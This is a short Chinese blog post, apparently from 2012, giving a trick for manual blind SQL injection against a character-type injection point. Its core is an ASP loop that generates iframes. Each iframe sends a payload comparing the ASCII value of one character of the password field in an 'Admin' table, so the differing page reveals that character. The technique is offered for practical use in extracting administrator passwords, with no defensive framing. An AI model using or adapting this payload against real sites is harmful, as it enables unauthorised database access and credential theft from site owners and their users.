字符型SQL注入猜解,利用iframe显示更方便

分类:安全 | 2012-02-19 | 撸过 63 次
0人扯谈

遇到一个注入点 是字符型的

测试了几个工具 貌似都不行

那就只有手工了

大家都知道 到猜解值的时候 一个一个asc大小的比较 还是比较麻烦的

所以想到这个

<%

for s=40 to 128
    response.write "<iframe src=""https://www.webshell.cc/default.asp?id=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&")  and '1'='1""></iframe>"
next

%>

这样一下就能显示所以存在的可能 就能很方便的查看 哪个值对应的页面有所不一样

本站内容均为原创,转载请务必保留署名与链接!
字符型SQL注入猜解,利用iframe显示更方便:https://www.webshell.cc/3099.html
标签: ,

相关日志